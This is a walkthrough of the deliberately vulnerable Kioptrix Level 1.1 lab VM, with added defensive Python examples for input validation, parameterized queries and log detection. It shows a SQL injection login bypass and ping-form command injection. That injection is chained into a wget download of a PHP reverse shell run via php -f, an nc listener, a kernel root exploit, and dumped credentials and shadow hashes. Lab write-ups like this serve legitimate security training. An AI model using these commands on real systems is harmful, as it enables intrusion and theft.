VulnHub Writeup : Kioptrix Level 1.1 (#2)

Box Stats:

Box Information    Details
Box Name           Kioptrix Level 1.1 (#2)
Series             Kioptrix
Release Date       11 Feb 2011
Author             Kioptrix
Difficulty         Medium
Download Link      Link

Nmap Scan

The IP address of the target VM is 192.168.1.4.

# Nmap 7.80 scan initiated Thu Apr 16 13:44:53 2020 as: nmap -A -oN nmap.scan 192.168.1.4
Nmap scan report for 192.168.1.4
Host is up (0.00042s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
|_ssl-date: 2020-04-16T10:36:08+00:00; -3h09m42s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.27
Network Distance: 2 hops

Host script results:
|_clock-skew: -3h09m42s

TRACEROUTE (using port 256/tcp)
HOP RTT     ADDRESS
1   0.05 ms 172.17.0.1
2   0.32 ms 192.168.1.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 16 13:46:48 2020 -- 1 IP address (1 host up) scanned in 115.94 seconds

Some interesting findings are:

22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
631/tcp  open  ipp        CUPS 1.1
3306/tcp open  mysql      MySQL (unauthorized)

Port 80 is open and serves a web page with a login form.

There may be an SQL injection vulnerability. I tried to find SQL injection with sqlmap, but it did not find anything.

$ sqlmap -u "http://192.168.1.4/index.php" --data="uname=admin&psw=12345&btnLogin=Login"

After trying manually with Burp Repeater, however, there turns out to be an SQL injection vulnerability in the psw field, which can be exploited by putting ' or 1='1 --+ in the password field. The login then loads another page where we can ping any device within the network.

192.168.1.10
PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=55.5 ms
64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=3.62 ms
64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.08 ms
 
--- 192.168.1.10 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 1.087/20.070/55.501/25.074 ms, pipe 2

Since this functionality passes the address to a system command, there is a possibility of command injection. Try to execute a command by appending it to the IP address:

ip_address;command

For example

192.168.1.10;ls

As expected, it returns the filenames in the current directory.

192.168.1.10;ls
PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=54.0 ms
64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=3.52 ms
64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.17 ms

--- 192.168.1.10 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2001ms
rtt min/avg/max/mdev = 1.175/19.587/54.059/24.394 ms, pipe 2
index.php
pingit.php

Another example:

192.168.1.10;ls -al;pwd;whoami
PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=57.1 ms
64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=1.18 ms
64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.17 ms

--- 192.168.1.10 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2001ms
rtt min/avg/max/mdev = 1.173/19.832/57.144/26.383 ms, pipe 2
total 24
drwxr-xr-x  2 root root 4096 Oct  8  2009 .
drwxr-xr-x  8 root root 4096 Oct  7  2009 ..
-rwxr-Sr-t  1 root root 1733 Feb  9  2012 index.php
-rwxr-Sr-t  1 root root  199 Oct  8  2009 pingit.php
/var/www/html
apache

The user is apache, the directory is /var/www/html, and all the files are owned by root.
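The ping page above splices the submitted address into a shell command, which is why "192.168.1.10;ls" runs ls. As an added example (not code from the box or the writeup), here is the same feature written defensively in Python: validate that the field is exactly one IP address, run ping with an argv list instead of a shell, and flag request-log entries whose value carries shell metacharacters. The form field name ip and the log format are assumptions.

```python
import ipaddress
import re
import subprocess
from urllib.parse import unquote_plus

# Characters the shell treats specially. With pingit.php-style concatenation,
# any of them in the target field can start a second command ("192.168.1.10;ls").
SHELL_META = re.compile(r"[;&|`$<>(){}\r\n]")

def ping_unsafe(value):
    # The vulnerable pattern: the raw field is spliced into a shell command line.
    return subprocess.run("ping -c 3 " + value, shell=True,
                          capture_output=True, text=True).stdout

def validate_target(value):
    """Return the normalized address if value is exactly one IP address, else None."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        return None

def build_ping_argv(value):
    """Hardened form: validate, then build an argv list. With no shell involved
    there is no parser that could turn ';' or '|' into a command separator."""
    target = validate_target(value)
    if target is None:
        raise ValueError("rejected ping target: %r" % value)
    return ["ping", "-c", "3", target]

def ping_safe(value):
    return subprocess.run(build_ping_argv(value), capture_output=True,
                          text=True, timeout=15).stdout

def suspicious_ping_requests(log_lines):
    """Detection: log lines whose ip= parameter (field name assumed) contains
    shell metacharacters once URL-decoded; a browser sends ';' as %3B."""
    hits = []
    for line in log_lines:
        m = re.search(r"ip=([^&\s]*)", line)
        if m and SHELL_META.search(unquote_plus(m.group(1))):
            hits.append(line)
    return hits

# Constructed sample log (not from the box). Apache's default access log does
# not record POST bodies, so this assumes a body-logging module or WAF log.
SAMPLE_LOG = [
    '192.168.1.3 "POST /pingit.php" ip=192.168.1.10',
    '192.168.1.3 "POST /pingit.php" ip=192.168.1.10%3Bls',
    '192.168.1.3 "POST /pingit.php" ip=192.168.1.10%3Bls+-al%3Bpwd%3Bwhoami',
]

if __name__ == "__main__":
    print(build_ping_argv("192.168.1.10"))
    print(suspicious_ping_requests(SAMPLE_LOG))
```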

Getting a remote shell

We are going to use the PHP reverse shell from pentestmonkey.net: Download Link

Download it from their page and change $ip and $port to the address and listening port of your local system.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.1.3';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

Now, to upload this PHP file, we use a series of commands. First start a server to host the bd.php file (I renamed the reverse shell PHP file). We can use a simple Python server:

python -m SimpleHTTPServer 8000

Commands to upload the file:

cd /tmp                               # change directory to /tmp
wget http://192.168.1.3:8000/bd.php   # download the backdoor file
php -f bd.php                         # execute the file

Remember that we can't download the file into the webroot directory, because it is owned by root and the ping command is executed as user apache. Before executing the commands, first start the listener on the local machine:

$ nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)

Command:

192.168.1.10;cd /tmp;wget http://192.168.1.3:8000/bd.php;php -f bd.php

After execution we get a reverse shell on the listener:

$ nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 192.168.1.4 45265 received!
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
 12:21:07 up  6:17,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-3.00$
sh-3.00$ whoami
apache

We now have a reverse shell as the apache user.

Kernel Privilege Escalation

Examining the OS and kernel version:

sh-3.00# uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
sh-3.00# cat /etc/*-release
CentOS release 4.5 (Final)

A Google search for "kernel 2.6 exploit" gives an exploit for kernel 2.6.22 and lower, found here: https://www.exploit-db.com/exploits/9542

$ wget https://www.exploit-db.com/raw/9542
$ mv 9542 peroot.c

Now download it onto the Kioptrix machine (served from the same Python HTTP server) and compile it:

sh-3.00$ cd /tmp
sh-3.00$ wget http://192.168.1.3:8000/peroot.c
sh-3.00$ gcc peroot.c -o peroot
dirty.c:109:28: warning: no newline at end of file
sh-3.00$ ./peroot
sh-3.00# whoami
root

This gives us root access.

Examining Files

By examining the PHP files in the webroot directory we find the user 'john' and its password 'hiroshima' in the mysql_connect() call.

 sh-3.00# cd /var/www/html
 sh-3.00# ls
 index.php
 pingit.php
 sh-3.00# cat index.php
 <?php
     mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
     //print "Connected to MySQL<br />";
     mysql_select_db("webapp");
 
     if ($_POST['uname'] != ""){
         $username = $_POST['uname'];
         $password = $_POST['psw'];
         $query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
         //print $query."<br>";
 ...
 ...
 ...
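The concatenated query in index.php above is the root cause of the login bypass found earlier. The following is an added example, not code from the box or the writeup: a SQLite stand-in for the users table with the vulnerable query next to a parameterized one. Because SQLite does not coerce text to numbers the way MySQL does, the tautology uses quoted digits rather than the exact ' or 1='1 --+ string.

```python
import sqlite3

# Constructed stand-in for the box's webapp.users table; the two rows are the
# values the writeup later reads out of MySQL.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(id INT, username VARCHAR(100), password VARCHAR(10))")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "5afac8d85f"), (2, "john", "66lajGGbla")])
    return db

def login_vulnerable(db, username, password):
    # index.php's pattern: the raw form fields are spliced into the SQL text,
    # so a quote in psw ends the string literal and the rest is parsed as SQL.
    query = ("SELECT * FROM users WHERE username = '%s' AND password='%s'"
             % (username, password))
    return db.execute(query).fetchall()

def login_parameterized(db, username, password):
    # Hardened form: bound parameters travel as data and are never parsed as SQL;
    # in PHP the equivalent is a mysqli or PDO prepared statement.
    return db.execute("SELECT * FROM users WHERE username = ? AND password = ?",
                      (username, password)).fetchall()

# Tautology payload in the spirit of the writeup's ' or 1='1 --+ . MySQL coerces
# the text '1 -- ' to the number 1, so 1='1 -- ' is true there; SQLite does not
# coerce, so the digit is quoted on both sides of the '=' here.
PAYLOAD = "' or '1'='1"

def demo():
    db = make_db()
    return {
        "vulnerable": login_vulnerable(db, "admin", PAYLOAD),      # every row
        "parameterized": login_parameterized(db, "admin", PAYLOAD),  # no rows
        "real_login": login_parameterized(db, "john", "66lajGGbla"),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```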

Using john's credentials we can't access the system over SSH, but we can access the MySQL database. Now try executing commands in MySQL:

 sh-3.00# mysql -u john -phiroshima -e 'show databases;'
 Database
 mysql
 test
 webapp
 sh-3.00# mysql -u john -phiroshima -e 'use webapp;show tables;'
 Tables_in_webapp
 users
 sh-3.00# mysql -u john -phiroshima -e 'use webapp;select * from users;'
 id username password
 1   admin   5afac8d85f
 2   john    66lajGGbla

Now at least we have the login passwords for the users of the index.php login page.

We can also look at the .mysql_history file for commands previously typed by users:

 show databases;
 create database webapp;
 use webapp;
 create table users(id INT,username varchar(100),password varchar(10));
 show database;
 select * from users;
 show databases;
 use webapp;
 insert into users values(1,'admin','hello');
 select * from users;
 use mysql
 show databases;
 use mysql;
 select * from users where user=john;
 show tables;
 select * from user where user=john;
 select * from user where user='john';
 select * from user;
 create user 'john'@'localhost' identified by 'hiroshima';
 create user 'webapp'@'localhost' identified by 'hiroshima';
 create user 'webapp'@'localhost' IDENTIFIED BY 'hiroshima';
 CREATE USER 'webapp'@'localhost' identified by 'hiroshima';
 update user set password = password('hiroshima') where user = 'john';
 use mysql;
 show users;
 select * from user;
 create user 'john'@'localhost' identified by 'hiroshima';
 version;
 -v
 ;
 help
 flush privileges;
 show databases;
 use mysql;
 grant select,insert,update,delete on *.* to 'john'@'localhost';
 update user set password = password('hiroshima') where user = 'john';
 flush priveleges;
 use webapp;
 show tables;
 update user set password = password('Ha56!blaKAbl') where user = 'admin';
 update username set password = password('Ha56!blaKAbl') where user = 'admin';
 select * from users;
 update username set password = password('Ha56!blaKAbl') where username = 'admin';
 update users set password = password('Ha56!blaKAbl') where username = 'admin';
 select * from users;
 insert into users values(2,'john','66lajGGbla');
 select * from users;

From the /etc/shadow file we get the hashed passwords for the users:

root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::
john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::
harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::
